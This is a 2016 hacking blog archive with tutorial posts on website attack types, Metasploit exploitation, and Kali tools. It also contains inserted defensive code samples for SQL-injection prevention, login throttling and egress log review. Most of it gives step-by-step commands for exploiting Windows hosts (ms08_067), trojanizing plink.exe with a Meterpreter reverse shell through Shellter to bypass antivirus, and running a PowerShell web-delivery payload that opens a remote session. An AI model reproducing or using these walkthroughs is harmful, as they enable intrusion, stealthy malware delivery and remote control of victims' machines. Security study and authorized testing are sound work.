Thursday, 3 March 2016

Best Techniques To Hack A Website Easily

Hi friends, welcome to HacCoders. Drawing on what I know about how hackers think from my experience as an ethical hacker, today I am going to share with you the ways websites get hacked. Hackers use different methods to target a website or a server, either to steal sensitive information or to use the server's resources to send spam or carry out other malicious activities.

Of course, the consequences of such an attack can be devastating, and the worst part is when they use your server resources to perform various illegal activities.
In this article, I will list the top six website security problems that you should be aware of.

#1. Code Injection

Websites that lack some kind of form validation are vulnerable to code injection. This happens when code is injected into a computer program or a web application with the intention of changing the course of execution, to gain access to an organization's resources. These kinds of code injection can be fatal: they range from completely destroying a website to stealing valuable user information.

In 2013, hackers managed to steal over $100,000 from an ISP based in an American state. So staying safe from code injection is a must. To protect your website from this kind of attack, you need to prevent any untrusted input, such as invalid characters, from reaching your SQL database.

#2. SQL Injection 

SQL injection is a code injection technique that is used to manipulate a website's database. This form of attack is used by hackers to target dynamic CMS databases such as WordPress to steal data and other valuable information.
SQL injection is also the most common type of application-layer attack technique in use today. This kind of attack affects web applications that are improperly coded and allows the hacker to inject SQL commands into any login form, which gives them easy access to the data held within your database.
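
The login-form problem described in #1 and #2, shown as an added example that is not part of the original post: the same lookup written with string concatenation and with a parameterized query. The table layout, function names and sample values are assumptions made for the illustration, and password hashing is left out of scope.

```python
import sqlite3


def make_db():
    """Build an in-memory user table (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'stored-hash-for-alice')")
    return db


def login_vulnerable(db, name, password_hash):
    # Improperly coded: the form input is pasted into the SQL text, so a quote
    # in the input ends the string literal and the remainder is parsed as SQL.
    query = (
        "SELECT name FROM users WHERE name = '%s' AND password_hash = '%s'"
        % (name, password_hash)
    )
    return db.execute(query).fetchone() is not None


def login_parameterized(db, name, password_hash):
    # Hardened: placeholders send the input as data; it is never parsed as SQL.
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password_hash = ?",
        (name, password_hash),
    ).fetchone()
    return row is not None


# Constructed form input: closes the quoted name and comments out the
# password check that follows it.
CRAFTED_NAME = "alice' --"


def demo():
    """Return what each version does with the same three inputs."""
    db = make_db()
    results = {
        "vulnerable_crafted": login_vulnerable(db, CRAFTED_NAME, "wrong"),
        "parameterized_crafted": login_parameterized(db, CRAFTED_NAME, "wrong"),
        "parameterized_valid": login_parameterized(
            db, "alice", "stored-hash-for-alice"
        ),
    }
    # A harmless apostrophe in a real name breaks the concatenated query too,
    # which is often the first visible symptom of the bug.
    try:
        login_vulnerable(db, "O'Brien", "x")
        results["vulnerable_apostrophe"] = "no error"
    except sqlite3.OperationalError:
        results["vulnerable_apostrophe"] = "syntax error"
    results["parameterized_apostrophe"] = login_parameterized(db, "O'Brien", "x")
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, "->", outcome)
```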

#3. Cross Site Scripting (XSS)

XSS is a type of security vulnerability found in web applications, in which a hacker injects a client-side script into trusted web pages or URLs, allowing them to steal sensitive user data or other information.
XSS can also enable an attacker to manipulate a web page and display it to visitors as if it were a login screen. An example of this attack was discovered to affect WordPress 4.2 comments, which enabled attackers to compromise a website using the comments.


To check for XSS vulnerabilities, you can use a Web Vulnerability Scanner (WVS). A Web Vulnerability Scanner scans your website and checks whether it is vulnerable to XSS. It will tell you which URLs or scripts are prone to these attacks so that you can fix them. WVS will also check for SQL injection or any other web vulnerability.

#4. Brute-force attack

Brute-force attacks work by guessing your username and password until the right combination is found. Weak passwords can easily be guessed by this attack, which is why it is strongly recommended to use strong, hard-to-guess passwords.
Protecting yourself from this attack is easy: you can simply block IP addresses that are taking up too many server resources, or you can use multi-factor authentication, and don't forget to use strong passwords.
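
One way to implement the IP blocking mentioned above, as an added example that is not part of the original post: a sliding-window counter that blocks an address after repeated failed logins. The thresholds, class name and the sample events are assumptions chosen for the illustration.

```python
from collections import defaultdict, deque

MAX_FAILURES = 5       # assumed policy: failures tolerated per window
WINDOW_SECONDS = 60    # assumed policy: length of the sliding window
BLOCK_SECONDS = 300    # assumed policy: how long an address stays blocked


class LoginThrottle:
    """Tracks failed logins per source IP and blocks noisy addresses."""

    def __init__(self):
        self.failures = defaultdict(deque)  # ip -> timestamps of recent failures
        self.blocked_until = {}             # ip -> time the block expires

    def is_blocked(self, ip, now):
        return self.blocked_until.get(ip, 0) > now

    def record(self, ip, success, now):
        """Record one attempt. Returns False if it must be refused outright."""
        if self.is_blocked(ip, now):
            return False
        if success:
            self.failures.pop(ip, None)     # a good login resets the counter
            return True
        recent = self.failures[ip]
        recent.append(now)
        # Drop failures that have aged out of the window.
        while recent and now - recent[0] > WINDOW_SECONDS:
            recent.popleft()
        if len(recent) >= MAX_FAILURES:
            self.blocked_until[ip] = now + BLOCK_SECONDS
            recent.clear()
        return True


# Constructed sample events: (seconds, source IP, username, login succeeded?)
SAMPLE_EVENTS = [
    (0, "203.0.113.7", "admin", False),
    (2, "203.0.113.7", "admin", False),
    (4, "203.0.113.7", "admin", False),
    (6, "203.0.113.7", "admin", False),
    (8, "203.0.113.7", "admin", False),    # fifth failure: block starts
    (10, "203.0.113.7", "admin", True),    # refused, even with a valid password
    (15, "198.51.100.4", "bob", False),
    (20, "198.51.100.4", "bob", False),
    (30, "198.51.100.4", "bob", True),     # ordinary typo pattern, never blocked
    (400, "203.0.113.7", "admin", False),  # block expired, counting restarts
]


def replay(events):
    """Feed events through the throttle; return refused attempts and blocked IPs."""
    throttle = LoginThrottle()
    refused, blocked = [], set()
    for ts, ip, _user, success in events:
        if not throttle.record(ip, success, ts):
            refused.append((ts, ip))
        if throttle.is_blocked(ip, ts):
            blocked.add(ip)
    return refused, blocked


if __name__ == "__main__":
    refused, blocked = replay(SAMPLE_EVENTS)
    print("refused attempts:", refused)
    print("blocked addresses:", sorted(blocked))
```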

#5. Denial of Service Attack (DoS)

The most infamous type of attack is the DoS attack, simply because any hacker can bombard the victim's website with countless requests, which causes the server to crash. DoS attacks are not hacking attacks; they are simply used to take down a website. This, of course, takes the website offline, and it requires manual intervention from the webmaster to bring it back online.

Moreover, an attacker can also send you spam email messages to attack your email account. Since your email account is supplied by a free service like Outlook, you are given a limited quota, which limits your account to a certain amount of data that you can send. By spamming your email account, an attacker can consume your entire quota, preventing you from receiving any more messages. Imagine you open your email account one day and see thousands of spam messages.

#6. Unencrypted Protocols

Any protocol that is unencrypted can allow an attacker to steal valuable information from your users. Thus, it is always preferred and recommended to use the standard security encryption technology called “Secure Sockets Layer”, or SSL for short, whenever personal information is being exchanged between your website and the database.
SSL works by providing a secure channel between two machines operating over the internet or an internal network. This protocol is used when a browser needs to connect to a web server securely over the internet, away from the prying eyes of hackers.

#How to protect your website

If you are using a Content Management System (CMS) like Joomla or WordPress, subscribe to their blogs, read their latest articles and always keep your CMS up to date. Keep all of your third-party plugins up to date as well. Remember, any form that allows users to upload something can be a potential threat. These threats can allow an attacker to gain full access to your data. Therefore, pay attention to what your users are uploading and scan these files before you approve them.

Install security plugins for your CMS and keep them up to date. Make sure you know how to configure them properly to maximize their protection. If you built your own CMS or website with an admin login form, don't use the default admin name; e.g. instead of “adminlogin.php”, why not call it “something.php”?

Test your website for vulnerabilities. Use the free trial of a Web Vulnerability Scanner to test your website. Make sure you are using strong passwords and never share them with anyone. Keep these passwords in a safe place. It is advisable not to store them on your PC, just in case your PC gets hacked.

Saturday, 6 February 2016

Metasploit Full Tutorials Beginners To Professional



The Metasploit Framework (MSF) is far more than just a collection of exploits. It’s an infrastructure that you can build upon and utilize for your custom needs. This allows you to concentrate on your unique environment, and not have to reinvent the wheel. I consider the MSF to be one of the single most useful auditing tools freely available to security professionals today. From a wide array of commercial grade exploits and an extensive exploit development environment, all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment.
This course has been written in a manner to encompass not just the front end “user” aspects of the framework, but rather give you an introduction to the capabilities that Metasploit provides. We aim to give you an in depth look into the many features of the MSF, and provide you with the skill and confidence to utilize this amazing tool to its utmost capabilities.


Normally to update Metasploit, you simply run “msfupdate”, but according to the Rapid7 website, Metasploit updates are synced to update weekly with Kali.


Metasploit Overview

To start Metasploit, simply type “msfconsole” in a terminal.
Once Metasploit loads you will see the following main screen and be given an “msf >” prompt.

Metasploit can be a little confusing if you have never used it before, but once you get used to how it works, you can do some amazing things with it.

Basically, using Metasploit to attack a target system usually involves:

1. Picking an Exploit
2. Setting Exploit Options
3. Picking a Payload
4. Setting Payload Options
5. Running the Exploit
6. Connecting to the Remote System
7. Performing Post Exploitation Processes

The screenshot below shows an example of this process, but don’t worry; we will cover the process in much more detail as we go along.


Depending on the type of exploit, once our exploit is complete we will normally end up with either a remote shell to the computer or a Meterpreter shell.

A remote shell is basically a remote terminal connection or a text version of a remote desktop for Windows users. It allows us to enter commands as if we are sitting at the keyboard.

But a Meterpreter shell offers a ton of interesting programs and utilities that we can run to gather information about the target machine, control devices like the webcam and microphone, or even use this foothold to get further access into the network.

And of course, if needed, you can drop to a regular shell at any time.

In most cases, depending on what you are trying to do, a Meterpreter Shell is much more advantageous than just a regular shell.

We will discuss the Meterpreter Shell later, but for now let’s quickly cover the first five steps.

Tech Note:
When all else fails and you start to feel lost in Metasploit, or the Meterpreter shell, try typing the “help” command.
You can also use the “tab” key to autocomplete a line or hit it twice to show all available exploits and payloads.

Ex. show exploits <tab><tab>

Picking an Exploit

If you are a glutton for punishment and want to view all the exploits, just type “show exploits” from the msf prompt:

msf > show exploits

But it is easier to use the search command to find what you are looking for. Simply type “search” and then the information you want. Sometimes being very specific will help you find the exploit you want quicker.

Tech Note:
If you see an error that says, “[!] Database not connected or cache not built, using slow search” all you need to do is start the PostgreSQL Database before running msfconsole (though your search will work without it running, it will just be slower).
To start the Database at a terminal prompt, type the following:

● service postgresql start
● service metasploit start
● msfconsole

Metasploit allows you to search for exploits in multiple ways, by platform, or even CVE (Common Vulnerabilities and Exposures) and bugtrack numbers.
Type “help search” to see all of the options:


To search by name, just type search and the text you want. So for example to see if Metasploit has an exploit for Microsoft’s Security Bulletin MS13-069 vulnerability:


To see a specific CVE ID number:


To see all the CVE ID’s from this year (truncated list):


Or to see exploit information for a particular program just use its name:

msf > search unreal

When you see an exploit that you want to know more about, just copy and paste the full path name and use the info command:

msf > info exploit/unix/irc/unreal_ircd_3281_backdoor

This will display the full information screen for the exploit:


The information screen shows the author’s name, a brief overview (not shown) along with the basic options that can be set, a description and website security bulletin references for the exploit (shown).

As you can see in the picture above, we can set a couple options for this exploit, which leads us into our next section.

But before we set our exploit options, we need to “use” it. Once we know we have the exploit we want, we simply run the “use” command with the exploit name. Again copying and pasting the exploit path and name works very well here too:

Okay, we are now using our exploit, so how do we set the options?

Setting Exploit Options

Setting options in Metasploit is as simple as using the “set” command followed by the variable name to set and then the value.

set <Variable Name> <Value>

Tech Note:
LHOST = Local Host, or our Kali System
RHOST = Remote Host, or our target System
LPORT = Port we want to use on our Kali System
RPORT = Port we want to attack on our target System

To see what variables can be set, use the “show options” command:

This exploit only uses two main variables, RHOST and RPORT. RHOST is the remote host that we are attacking and RPORT is the remote port.

Let’s go ahead and set the RHOST variable using the set command. If the target system’s IP address was then we would use the set command below:


If we run the “show options” command again, we can see that the variable has indeed been set:

This is all you really need to set in this exploit. You could now run the “exploit” command to execute it.
If you are feeling a bit lost, don’t panic, we will cover this in more detail in the Metasploitable chapter.

Multiple Target Types

The Unreal backdoor was a fairly easy exploit to use. Some exploits have multiple variables that you need to set and they might even have some optional variables that can also be configured.

As you use Metasploit, you will find that some have multiple target types that can be attacked, and that the exact target needs to be set for the exploit to work properly. To see the target, enter “show targets”.

On the exploit we used above, the target is automatic, so we don’t need to set it.


But on others, there are numerous targets and we need to pick the right one.

Getting a remote shell on a Windows XP Machine

We took a brief look at one of the Linux exploits, let’s go ahead and run through the ms08-067 exploit as it is one of the more popular Windows exploits.

1. To start, simply use the exploit:
msf > use exploit/windows/smb/ms08_067_netapi

2. Now type, “show options”:


Notice that by default the target is set to “Automatic Targeting”. I have had mixed results with using automatic targeting, and sometimes things work better if you set the exact target.

3. If we want to set a specific target type, “show targets”:


4. Then type, “set target <ID#>” to set the actual target


5. And again a “show options” will reveal that we indeed have the target value set:


Lastly, though not often used in regular exploits, we can also set advanced options if we want.
To show the advanced options, just type “show advanced”:


Now we have seen how to select an exploit and how to set the options. On many exploits we also need to set a payload.

Picking a Payload

What’s the fun of exploiting a machine if you can’t do anything with it? Payloads allow you to do something functional with the exploited system.

Metasploit comes with a multitude of different payloads that you can use. To see them, just type “show payloads”:

Or you can type “set payload” and hit the tab key twice. This will prompt Metasploit to ask you if you want to see all the available payloads:

Most of the payloads are laid out in the format of ‘Operating System/Shell Type’ as shown below:
● set payload osx/x86/shell_reverse_tcp
● set payload linux/x64/shell_reverse_tcp
● set payload windows/shell_reverse_tcp
● set payload windows/meterpreter/reverse_tcp

Simply select the correct OS for your target and then pick the payload you want.

The most popular types of payloads are shells, either a regular remote shell or a Meterpreter shell.

If we just want a remote terminal shell to remotely run commands, use the standard shell. If you want the capability to manipulate the session and run extended commands then you will want the Meterpreter shell (which we will discuss in further detail in the next chapter).

There are different types of ways that the payloads communicate back to the attacking system. I usually prefer reverse_tcp shells as once they are executed on the target system, they tell the attacking machine to connect back out to our Kali system.

The big advantage to this is that with the victim machine technically “initiating” the connection out, it usually is not blocked by the Firewall, as a connection trying to come in from the outside most likely will.
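
The defender's side of this point, as an added example that is not part of the original tutorial: when outbound connections are not filtered, a connection initiated from inside passes the firewall, so egress should be restricted and reviewed. The sketch below checks constructed firewall log lines against an assumed egress policy; the log format, subnets and port allowlist are all assumptions.

```python
import ipaddress
import re

WORKSTATIONS = ipaddress.ip_network("10.0.0.0/24")  # assumed client subnet
INTERNAL = ipaddress.ip_network("10.0.0.0/8")       # assumed internal range
ALLOWED_EGRESS_PORTS = {53, 80, 443}                # assumed egress policy

# Assumed log format, one connection per line.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<dir>IN|OUT) "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    "2016-02-06T10:15:02 ALLOW OUT src=10.0.0.23 dst=192.0.2.80 dport=443 proto=tcp",
    "2016-02-06T10:15:09 ALLOW OUT src=10.0.0.23 dst=198.51.100.9 dport=4444 proto=tcp",
    "2016-02-06T10:16:41 ALLOW IN src=198.51.100.9 dst=10.0.0.23 dport=445 proto=tcp",
    "2016-02-06T10:17:30 ALLOW OUT src=10.0.0.40 dst=198.51.100.9 dport=4545 proto=tcp",
    "2016-02-06T10:17:55 ALLOW OUT src=10.0.0.23 dst=10.0.1.5 dport=3389 proto=tcp",
    "2016-02-06T10:18:00 ALLOW OUT src=10.0.5.1 dst=198.51.100.9 dport=4444 proto=tcp",
    "2016-02-06T10:18:20 DENY OUT src=10.0.0.40 dst=198.51.100.9 dport=8443 proto=tcp",
    "garbled line without the expected fields",
]


def flag_egress(lines):
    """Return (src, dst, dport) for workstation connections that left the
    network on a port outside the egress allowlist."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not parse instead of failing
        if m["action"] != "ALLOW" or m["dir"] != "OUT":
            continue  # only connections that actually left are of interest
        try:
            src = ipaddress.ip_address(m["src"])
            dst = ipaddress.ip_address(m["dst"])
        except ValueError:
            continue
        if src not in WORKSTATIONS or dst in INTERNAL:
            continue  # other subnets and internal traffic have their own rules
        port = int(m["dport"])
        if port not in ALLOWED_EGRESS_PORTS:
            findings.append((str(src), str(dst), port))
    return findings


if __name__ == "__main__":
    for src, dst, port in flag_egress(SAMPLE_LOG):
        print(f"review: {src} -> {dst}:{port} allowed out but not in egress policy")
```

A port allowlist is only a first filter; sending permitted web traffic through an authenticating proxy and changing the firewall default for outbound traffic to deny gives the review something to enforce.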

Once we know what payload we want to use, we set it using the “set” command.

6. So for our example let’s use a Meterpreter shell for a Windows system and have it connect back to us via TCP:

Now that our payload is set, we just need to set the options for it.

Setting Payload Options

Payloads have options that are set in the exact same way that the exploit is set. Usually payload settings include the IP address and port for the exploit to connect out to.

And these too are set with the “set” command.

7. Type “show options” to see what settings the payload needs:


As you can see in the image above, a new section titled “Payload options” shows up when we run the command. We also have three new options that we can set, “EXITFUNC, LHOST, and LPORT”.

We will leave the EXITFUNC and LPORT settings to the default.

8. But we need to put in the LHOST or local host address. This is the IP address for our Kali system:


Once our payload options are set, we can go ahead and run the exploit.

Running the Exploit

When starting out, it is always a good idea to run the “show options” command one last time and double check that everything is set correctly.


If you notice above, looks like we forgot to set the target system (RHOST) IP address!

We set the RHOST for a prior example, but when we switched exploits, we never re-set the remote host IP address. This can happen when you are running through a lot of exploits, or attacking different systems, so it is a good idea to double check your settings.

9. Set the RHOST option by typing:

Checking the options one last time, everything looks good:


Our payload is selected, and all the options that we need to set are set.

We can now run the exploit.

10. To do so, simply use the “exploit” command.


The exploit then runs; when it succeeds, the payload executes and we get a remote connection.

Connecting to a Remote Session

Once we have a successful exploit we will be able to view any remote sessions that were created. To check what sessions were created type the “sessions” command.

Any sessions that were created will show up along with the IP address, computer name and user name of the target system.

We can now connect to the session interactively with the “sessions -i <ID#>” command as shown in the sample session above.

When we connect to the session, the prompt will change into a meterpreter prompt:


We will cover the Meterpreter shell in more depth in the next chapter. But for now, if we just type the “shell” command we can see that we do indeed have a remote shell to the Windows system.

Thursday, 4 February 2016

Anti-Virus Bypass With Shellter 6.0 On Kali Linux


Hello Everyone, Welcome To HacCoders (Information You Can Trust!).. So Today We Will Discuss Anti-Virus ByPass With Shellter.. But First Know What Is Shellter Because Many People Don't Know What Is Shellter.. So Let's Start... :)

What Is Shellter..

Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.

Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.

So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )
I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.
2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Change to the ‘/root/Desktop/shellter’ directory.
4. Start Shellter – type, “wine shellter.exe”


5. Enter “A” for automatic
6. At the PE Target Prompt, enter “plink.exe”
7. When prompted to enable stealth mode enter “Y”:


This new feature allows the backdoored file to still function as the original file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)


Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:


You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost
  • set lport 4545
  • exploit

12. Copy the ‘plink.exe’ file to the Windows system:


13. Now, in Windows, If you run plink.exe from the command prompt:


It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:

Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:

We can run “sysinfo” to view information about the computer:


So We Are Successful.. Thanks For Reading..

Wednesday, 3 February 2016

Easy Remote Shell With Web Delivery


Hello Friends Welcome To HacCoders.. Today We Will Discuss To Get Windows Remote Shell Using Metasploit With Web Delivery Module.. So Let's Start..

Web Delivery

In this section we will learn how to use the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:


2. Now enter:
  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444
3. Type, “show targets”:


Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

7. Now type, “exploit”:


This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:


And after a few seconds you should see:


A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”


We now have a full Meterpreter shell to the target:


Type “exit” to quit the active session and “exit” again to exit Metasploit. I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also.

So We Will Successfully Get Windows Remote Shell Using Metasploit..

NOTE: This Is Only For Educational Purpose. I Will Not Be Responsible For Anything Done By You.


Tuesday, 2 February 2016

20 Fantastic Kali Linux Tools


Tools for Phase One

Information Gathering and Analysis

Kali Linux has a wonderful set of tools for gathering data on your target. The end goal of phase one is to have a logical map of the target’s network, both of people and of machines.

Any information discovered now may be key to a pivot later on, so thoroughness is your ally. Most tools in this stage are very quiet, so if time is not a critical factor in your attack, this is the best time to move slowly and dig deep. The more you sweat now, the less you’ll bleed later.

1. DNSenum Enumerating the Servers

The first high level maps of an organization’s network will come from locating its DNS servers. Starting with a good foundation here will help you find the key footholds you’ll need later. DNSenum is a high level tool that is very often the first step in mapping your target’s network. Using the format ...
./dnsenum --enum [TARGET DOMAIN NAME]
… we can begin enumeration of the higher level servers available to our target.

2. dmitry The Network Rangefinder

Once your DNSenum information has come back, you will have a range of servers used by your target. The goal of the dmitry rangefinder is to find out which IPs are used on those servers. This is done using a TCP traceroute command which can be threaded, and displayed graphically with dmitry commands.

3. Nmap

The Nmap (Network Map) project is famous for its standalone application and open source code. The Nmap tool in Kali Linux is used to determine if a host is alive, active, and gives a bounty of other information in one quick scan. Nmap is an essential tool for quickly gathering specific details on any active machine.

“Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.”

To add to the beauty, the Nmap scan can gather all of this information off only a handful of packets tossed around in such a way as to be quieter than many other available tools.


4. Maltego

Maltego is an excellent built-in tool from the development team at Paterva technologies. The design is unique and with a little time spent learning how to best play with it, Maltego quickly becomes an essential tool for any medium to large scale penetration test.

The system is built to determine relationships between actors in an environment. This could be a name, a DNS server, an IP address, a WHOIS lookup, or any number of other bits of information. Maltego will do some rooting around and come up with a logical map that displays these relationships visibly. An invaluable tool for the critical penetration tester, these logical maps will shed light on a messy situation, or reaffirm suspected relationship links.

Once all your information gathered from DNSenum, dmitry, and Nmap has been pored over and filtered into Maltego, a clean and clear logical map of your target’s environment can be formed.

5. Social Engineering Toolkit

The Social Engineering Toolkit (SET) is designed to help the penetration tester work against the human elements of the target’s security environment. Working with a wide variety of tools, SET enables the attacker to exploit weaknesses in security training, as opposed to weaknesses in hardware or software. 

Social Engineering takes on a different attack path at first glance, but information gained through social engineering attacks can quickly be turned into a serious advantage for the penetration testing team. SET can be accessed by opening a terminal and entering “setoolkit”.

Experience working with java applets will be helpful when working with SET to plan attacks. SET can also be used during Phase Four : Exploitation, to deliver clickables that will help gain access to a target’s machine. Personally I find it most useful in the information gathering stages, although it can be more invasive and louder depending on the level of security awareness in the target environment.

Tools for Phase Two

Vulnerability Detection and Enumeration

6. Nessus Working With Vulnerabilities

Taking your logical map from Maltego, and the wealth of technical information gathered from the time spent in Nmap, it’s time to find vulnerabilities that lie in the target’s system. Nessus takes command of the next step, finding vulnerabilities in the local system, in the local network, and in both Linux and Windows environments.

When checking a network for vulnerabilities, Nessus is as thorough as tools come. Although Nessus works on Kali Linux, it is not bundled with the download, and will need to be downloaded and unpackaged on the Kali Linux OS. Registration through the Nessus website is also required to run this tool.

7. OpenVAS Open Vulnerability Assessment System

OpenVAS is bundled and packaged with Kali Linux, but is less polished than its cousin. Both OpenVAS and Nessus work to discover vulnerabilities in local systems, networks, and operating systems. After running all your gathered information through one or both of these tools, you will have a list of vulnerabilities that will prove essential in getting into the target system.

Using the targeting data we gathered in phase one, you can set OpenVAS to scan each machine in the target’s network for vulnerabilities. After this detailed scan, you can take a step back and scan the target network itself for vulnerabilities. The list of weaknesses is long and varied, and will give the attackers essential data to help target a specific vulnerability to exploit.


Tools for Phase Three

Penetration Attempts

At this phase, penetration testers will take the logical maps of the environment, and the list of exploitable vulnerabilities gathered in phases one and two. In a team of attackers, this is the perfect time for a brief pause and gathering of the troops. Up until this point most of the tools used were relatively quiet and noninvasive, and while Kali Linux is generally a very quiet set of tools, the pattern of attacks from here on out is necessarily noisier, and a lot more rides on the quality of the defense. If the attacking team is properly prepared, choosing which attack vector to hit is the next key step.

Wi-Fi Attacking

8. Aircrack-ng

Aircrack-ng is a valuable tool for injecting wireless packets into an active network. This tool relies on the attacker's knowledge of wireless cards, both on the attacking machine and on the target machine, so before deploying Aircrack-ng in your offensive environment, Aircrack-ng can also recover 802.11 WEP and WPA-PSK keys by gathering packets sniffed wirelessly. WEP attacks have been well known and well documented in the security community since at least 2007, but because of the nature of networked communication, injection attacks are still a very popular method of getting access to a network.

Web Application Attacking

9. Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. Burp gives you full control, letting you combine advanced manual techniques with state-of-the-art automation, to make your work faster, more effective, and more fun.

10. Hydra

Web application exploitation is a growing source of headaches for defensive security teams worldwide. Hydra is an extremely fast password cracking tool which supports attacks in over 50 different protocols. However, due to the nature of Hydra's attack pattern, it's much noisier than other methods of password cracking. The brute force methods of password stealing that Hydra allows are very effective and exceptionally fast, but this should be considered a fallback tool for high-security environments as it will increase your chances of being detected.
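The noise described above is what defenders key on. The following is an added example, not part of the original article: a sliding-window check that flags any source producing a burst of failed logins. The log layout (ISO timestamp, host, sshd message), the host name, the addresses and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed line format: ISO timestamp, host, then a standard sshd "Failed password" message.
FAILED = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def sample_log():
    """Constructed log: a fast guessing burst from one source, plus a user mistyping slowly."""
    base = datetime(2016, 3, 3, 10, 0, 0)
    lines = []
    for i in range(8):  # eight failures, one second apart, alternating account names
        who = "root" if i % 2 else "invalid user admin"
        ts = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{ts} web01 sshd[411]: Failed password for {who} "
                     f"from 203.0.113.7 port {40000 + i} ssh2")
    for i in range(3):  # three failures, five minutes apart
        ts = (base + timedelta(minutes=5 * i)).isoformat()
        lines.append(f"{ts} web01 sshd[412]: Failed password for alice "
                     f"from 198.51.100.20 port 51000 ssh2")
    lines.append(f"{(base + timedelta(minutes=11)).isoformat()} web01 sshd[412]: "
                 "Accepted password for alice from 198.51.100.20 port 51000 ssh2")
    return "\n".join(lines)

def detect_bursts(log_text, threshold=5, window=timedelta(seconds=10)):
    """Map each source IP that reaches `threshold` failures inside `window`
    to its peak failure count and the account names it tried."""
    recent = defaultdict(deque)  # ip -> (timestamp, user) pairs still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue
        ts = datetime.fromisoformat(m["ts"])
        q = recent[m["ip"]]
        q.append((ts, m["user"]))
        while ts - q[0][0] > window:  # drop failures that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(m["ip"], {"peak": 0, "users": set()})
            alert["peak"] = max(alert["peak"], len(q))
            alert["users"].update(user for _, user in q)
    return alerts

if __name__ == "__main__":
    for ip, info in detect_bursts(sample_log()).items():
        print(ip, info["peak"], sorted(info["users"]))
```

The burst from one address is flagged with both account names it tried, while the user who mistypes three times over ten minutes stays below the threshold.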

11. OWASP ZAP

For the security-minded, OWASP should be a familiar name. The Open Web Application Security Project is well known as one of the most respected and active open source security projects on the internet. Founded as a nonprofit in 2001, the OWASP team has been active in information security, development of penetration tools and digital freedom movements. ZAP is the "Zed Attack Proxy Project". The tool is simple enough for new penetration testers, and robust enough for professional environments. Both passive and active scanners are built in, and brute force attacks can be used to break in and hunt for files even if there are no direct links to the files to be detected.

Password Attacks

12. John The Ripper

Known by the nickname "John", John the Ripper is a well-developed, free, all-purpose password attacking tool. Being able to call on different libraries of password guessing methods, from dictionary attacks to hybrid cracks to the cumbersome brute-force methods used in other tools, John is a catch-all for password guessing software.

13. Pass the Hash Toolkit

While John goes straight for the password in an attempt to reveal it, the Pass the Hash Toolkit enables attackers to gather the hash from an accepted password and use the data after the password is accepted to get through into systems without having to use noisy and slow password guessing techniques. In a very informative whitepaper out of the SANS Institute, we get a good overview of PtH techniques, and where they fit in contextually with other penetration testing tools.

Phase Four


This is the real meat of any penetration test. All the above tools are used to gain information and access to a system. Some offensively minded security professionals find the early stages of a penetration test to be tedious and dry. I believe the first three phases are not unlike playing a game of chess, where phase four is the final execution of your intricate plans just before a checkmate. 

